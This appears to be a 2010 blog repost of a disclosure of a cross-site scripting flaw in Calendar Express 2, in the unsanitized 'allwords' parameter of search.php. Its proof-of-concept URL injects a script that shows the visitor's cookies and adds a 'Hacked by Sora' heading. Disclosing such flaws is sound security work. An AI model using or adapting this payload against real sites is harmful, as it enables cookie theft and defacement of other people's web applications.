Calendar Express 2 Cross Site Scripting Exploit

# Exploit Title: Calendar Express 2 Cross Site Scripting Exploit
# Date: January 11th, 2010
# Author: Sora
# Version: 2.0
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Calendar Express 2 XSS Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Calendar Express 2 suffers a remote cross site scripting exploit in search.php with the parameter “allwords”
due to unsanitized inputs.

# Proof of Concept:
http://server/iwcalendar/search.php?allwords=”><script>alert(document.cookie)</script><H2>Hacked by Sora</h2>&oneword=&cid=3&catid=3

[ Greetz: ]

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 (Origin) # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

Be sure to visit cyber-sec.org and greyhathackers.wordpress.com!

[ —————— EOF —————— ]

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: